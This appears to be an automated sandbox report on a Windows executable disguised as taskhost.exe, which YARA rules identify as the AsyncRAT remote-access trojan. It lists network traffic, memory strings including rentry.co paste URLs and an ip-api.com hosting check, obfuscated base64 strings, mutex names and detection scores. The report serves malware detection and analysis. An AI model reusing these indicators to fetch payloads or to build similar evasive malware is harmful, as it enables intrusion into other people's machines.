              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:42 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VU9fcuE5u0TyThzOgaml8duM%2B%2Fc7VzwsECtxH5Y6xcIDIbrG1mtAOwgFeWeagLz5lO5VTGBrax2ulNNW%2FY2D%2F6eqLUb335BILLbaYZF%2BD4azJFyNoZu0tI%2FO4w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563959ed90f46-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1638&rtt_var=637&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1782661&cwnd=226&unsent_bytes=0&cid=2bd371121d77cc32&ts=803&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:47 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2Iz2TKKguUpwpnC5geLPLprK83nehs0CCtrwdk1dHr3as%2F3%2FnaVGBQVSMXEmSvR4P%2FcDWIUbeLmFStpLOTdLPpAUVm%2Bbgy1f9tukTXErwCVPxPGvR689Jq1qjw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563b4fd7e4295-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1612&rtt_var=608&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1795817&cwnd=252&unsent_bytes=0&cid=7fbc11b59a3f741b&ts=814&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rap4EozJcJZIuBQVNuQF6ZlXBSeiyDL%2FOSH1QjFy6QTysydstwxK%2FosnLCDIj%2B2cjyACkVZdnwcGi2lIuHZsheS2EEERVBa1iqebqwQ2Z2BI2oToW%2B6r%2BzjRkw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563d469f71a0b-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2190&min_rtt=1932&rtt_var=909&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1511387&cwnd=249&unsent_bytes=0&cid=69bd5b710199f618&ts=574&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:49:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sQE3rvNcOEy1fYggusv6moikNKFHIH8whOC71ke7HyjlvAZJrGcvpzIuIVpQjVWbpfi6YSP%2FKCd%2BFTp8mzQKxOU6GmFHiWdWHSzyinmYRizVHKm4u0di8O7n6g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1563f26d4d4343-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1696&rtt_var=651&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1662870&cwnd=244&unsent_bytes=0&cid=3686793b86563647&ts=815&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:02 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H0UUCiFk7O5ndHw%2BlWWNDni8M4LHu7boKi7kxaQqHiRwtcZJB%2BFnYeLb503gOw38NIL1Es8MporO2qFeAUipVxOvnWl5vdwH9YYaVlJEtbVtQJKN5J33Lk6UkQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f156411e9674277-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1563&min_rtt=1554&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=685&delivery_rate=1789215&cwnd=191&unsent_bytes=0&cid=8e20a23e1f332c7f&ts=830&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3CFKKMVz4bSOrNRs%2FmzvgSmPPJEL6XVHIMmMHisHQhMpkc9teMFf%2BHu5S8ZvomhsA4sbeXHNFP7QfF06ocHmRbB63KjAMeueo8aIfrXcfLb6617XVTqfhRxjyw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15642f98c84332-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1730&min_rtt=1723&rtt_var=660&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1640449&cwnd=113&unsent_bytes=0&cid=b3df73c5d50b549e&ts=591&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xhQwP1TvntwpwWtpbh2DORkRDj20wCv4AJa8J%2FthvkBW14z8X%2Fr8%2BP%2F3wGKXBBT5YWfwcih5X6mr9meOiP6iErTPnsgFHQGAKO2U2iPtWMECOLzMqKzL6jnt6Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15644a2bdc438c-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1698&min_rtt=1692&rtt_var=648&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1671436&cwnd=245&unsent_bytes=0&cid=8982980756dbdc27&ts=580&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RDYF3hJ3%2FLOA83tMhpfnKr7%2FCrhrrj%2BVpmihWRIr2GxUK%2Bc66ipayGBNkhljLpJO6LokekYQEGazsgltDbJX0zWTE4rbTFrM%2BYuQLNflAGe95zO%2ByTRcbFtrrg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1564635accc425-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1501&rtt_var=611&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1945369&cwnd=240&unsent_bytes=0&cid=ebbe48cb0f259ebb&ts=844&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=c0t%2BXXvw4qlptC70lkohDIpuzR3f5bkibCxLG54AslyzhdxTwNeGop%2BXwLNg9S8IJ%2Fxb0udTPOpaeUlbB4IqPozxvTDC%2BznwQEvhRuWcrMs%2Fm%2FJ5zTmQLmHj9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f15647ca895431b-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1688&rtt_var=844&sent=6&recv=7&lost=0&retrans=1&sent_bytes=4174&recv_bytes=685&delivery_rate=342200&cwnd=177&unsent_bytes=0&cid=28a45104d1297ad1&ts=584&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D%2FE2LuRHj2iXYk4D6AIicwxStEq9QjeG3cdW2RQNxwETnijMlwVWBWSDt42wqfmwIoJgcJHah9jA9UVRYlJtEbekvHOeHfcKEbmZHWJWmaQzzK216wq3yoaq%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f156492ea3b421c-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1582&min_rtt=1568&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1733966&cwnd=252&unsent_bytes=0&cid=42b037226ab416b4&ts=818&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rVCCjmWhFJSmeka4%2BeBAECG3RE5Ms3f4pcqCXrxkB0Egw7mY4I%2BAIpkTNmV4aHDDZ%2FwtyZLybV%2FDmWWYMSHe9iH1X1gpNyOCHZdZE33ZmV%2FuYcujupJD5rlCRQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1564a9bd580f9d-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1601&rtt_var=626&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1713615&cwnd=193&unsent_bytes=0&cid=155000c2e1fe942f&ts=819&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TPOZKN2WGTx7QfyU3xgbjzRj6167uvazt4QRFCAY1F27BqP3m06Dmo0XI%2FRPKPyxv9lY6owiE86EzU9RwkWehozZE9M%2BiHCxRaOfzIN2RIXxbjUNq31Qec0KXg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1564c03a468c09-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1967&rtt_var=751&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2818&recv_bytes=685&delivery_rate=1444114&cwnd=240&unsent_bytes=0&cid=accc3f17bacb2c88&ts=794&x=0"
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 10:50:33 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Originx-xss-protection: 1; mode=blockstrict-transport-security: max-age=31536000; includeSubDomainsCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Aj3VBETi6hfMikszMAntU5hd6ImUas9hTLVsGIXXBriA9mcRV%2FW4BX7OTvx0UfUnfT2RQ5wmhtA7GFwGpk%2FJdlOpAwut%2F51EI5Qd0PKimnaV2igWxaSldGTbjg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8f1564d4ebf04294-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1561&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2817&recv_bytes=685&delivery_rate=1795817&cwnd=213&unsent_bytes=0&cid=48c9e8cbea42e50b&ts=573&x=0"
              Source: powershell.exe, 0000000C.00000002.1598269735.0000020476C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mP
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002DFE000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002DE7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
              Source: taskhost.exeString found in binary or memory: http://ip-api.com/line/?fields=hosting
              Source: powershell.exe, 00000008.00000002.1441756050.000001C5A5B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
              Source: powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000003006000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://rentry.co
              Source: powershell.exe, 00000008.00000002.1422033285.000001C595D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1422033285.000001C595B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: powershell.exe, 00000008.00000002.1422033285.000001C595D39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
              Source: powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
              Source: powershell.exe, 00000008.00000002.1461200995.000001C5AE48C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.V
              Source: powershell.exe, 0000000C.00000002.1596432437.0000020476A70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
              Source: powershell.exe, 00000008.00000002.1422033285.000001C595B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1504196016.0000020400001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
              Source: powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
              Source: powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
              Source: powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
              Source: powershell.exe, 0000000C.00000002.1504196016.0000020400229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
              Source: powershell.exe, 00000008.00000002.1441756050.000001C5A5B84000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1579727738.0000020410072000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/270.png
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/static/icons/512.png
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/ue6sxoup/raw
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002D41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rentry.co/ue6sxoup/rawP
              Source: taskhost.exe, 00000000.00000002.2545878344.0000000002F0A000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E91000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002E3B000.00000004.00000800.00020000.00000000.sdmp, taskhost.exe, 00000000.00000002.2545878344.0000000002FA4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/gtag/js?id=G-LLFSDKZXET
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
              Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
              Source: unknownHTTPS traffic detected: 104.26.2.16:443 -> 192.168.2.7:49762 version: TLS 1.2

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: taskhost.exe, type: SAMPLEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 0.0.taskhost.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
              Source: C:\Users\user\Desktop\taskhost.exeCode function: 0_2_00007FFAAC9115110_2_00007FFAAC911511
              Source: C:\Users\user\Desktop\taskhost.exeCode function: 0_2_00007FFAAC9156560_2_00007FFAAC915656
              Source: C:\Users\user\Desktop\taskhost.exeCode function: 0_2_00007FFAAC9164020_2_00007FFAAC916402
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFAAC9D32A112_2_00007FFAAC9D32A1
              Source: taskhost.exe, 00000000.00000000.1261111681.0000000000B12000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs taskhost.exe
              Source: taskhost.exeBinary or memory string: OriginalFilenameXClient.exe4 vs taskhost.exe
              Source: taskhost.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: taskhost.exe, type: SAMPLEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0.0.taskhost.exe.b00000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000000.00000000.1261092658.0000000000B02000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: taskhost.exe, iN2F6NEn5nlUN46FY0x.csCryptographic APIs: 'TransformFinalBlock'
              Source: taskhost.exe, iN2F6NEn5nlUN46FY0x.csCryptographic APIs: 'TransformFinalBlock'
              Source: taskhost.exe, VpjB0nPRwGHi6IjtbgB.csCryptographic APIs: 'TransformFinalBlock'
              Source: taskhost.exe, iN2F6NEn5nlUN46FY0x.csBase64 encoded string: 'VC1RZy3DgJTRVJpqHXYyOVfyStKoiI12AfoDO2lz2pGXoX1DTC2lEonhuuJch2jPaX33', 'MI4MBGImw9dBVcL1AQCEMDAKLoeSZjCFfpNBgBXsNLpwFTZG2o6TGSMt61rH2zpK3brz', 'LXgoKleuh6vzBaOC7lmwGV9mBp9heXWkfiwrFRlaJGGbvBKllF4R6dy0IqyyysINhyDd', 'q4SUY1EJrZyTvfmGpUZwvtBVAJ4z55GlrPSVlakSdpQZb2kzBa5c3jn1IZLOVLdRKhl2'
              Source: taskhost.exe, VpjB0nPRwGHi6IjtbgB.csBase64 encoded string: 'nHHZBTl5WZAWsd8DCjcYgXP9DJPD8Lc3cMLYYu1KlCMTabMQgOrw5Aq8bN58LeKcmJfB', 'tbDzLc3rzP9it8TIWUrUCBWJrFERTRWled6kPz709kJLZqOzqkuSAZqdsP5LhVUL8jww', 'iJJhKmlARDIeWAc5iWHEZpw0J9kLJ2jnCoZi4xnWn0mOdzxQZkIrz1H1HRHemm3ovD8F'
              Source: taskhost.exe, pS1f3L7Tm54SySzhRUj.csBase64 encoded string: 'JvsVWC5j2ZC5r5Y1AwNyt7h3cuifqBtBr7ikeui34uy6xFGFhXuraqxXBPFpa2NoN6dd', 'YuAEV3dNWu6rpuYQt4WKehGOFyNdEfCYU1zLWufmTOF4H7ySH9jzf2zAPTzFWXgBVIPM', 'QAh47AqDJrEsor95LGaYTajGYx1TxKG5xA90A0M9QiU0iNqixfVqyysmOh3XjKVB6Q7l', 'WZdrKtl5nr3NwLl5wUHSeRav7IKaXq5L8UKtU3ByXr7cHwFBcbTz7z8ieeMbbEakP4Hj', 'TPBkBelY8IX6jF3gs7WRxu1UH1qneRqx9SntZyfWsHpQqLlePMZUVOIIBw8t0TYbYe9B', 'kMnOy8eoPeCj7WdDHL8McDtpEfn7gyJF5ZhlYs7bfF4tSQNM5u7d6UlCpOygvh2PQIIq', 'K2julVlAopX5ZY6vuL7hI8V1zy0VBzKQgdFkg4U0KfHDRPFYnVFm2g2DpJoVXwcj7eyI', 'uzPXtpE3ZYmzWf4MVYK0lO9jybnkTaI7fg2oNCnSaDYuH9eEtggKu0RTIMhzB7Hck0Sh', 'j6qxnX7NodoXQtU5EoH1kzhSIremrezZ7AnAuHHcM2tmhDYPWnKZJmhbZ90LxtKthAkY', 'H7kXYTgxPET9l4RLcmSl0REzB86NbAaOyGLEQTYoxSb3FXomFVhkomHQEEZMoAabcBWR'
              Source: classification engineClassification label: mal100.troj.evad.winEXE@7/9@2/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
              Source: C:\Users\user\Desktop\taskhost.exeMutant created: \Sessions\1\BaseNamedObjects\7sGvSvd4MtquysHs
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7464:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7824:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u3uyyjfj.mch.ps1Jump to behavior
              Source: taskhost.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: taskhost.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
              Source: C:\Users\user\Desktop\taskhost.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\taskhost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: taskhost.exeReversingLabs: Detection: 78%
              Source: unknownProcess created: C:\Users\user\Desktop\taskhost.exe "C:\Users\user\Desktop\taskhost.exe"
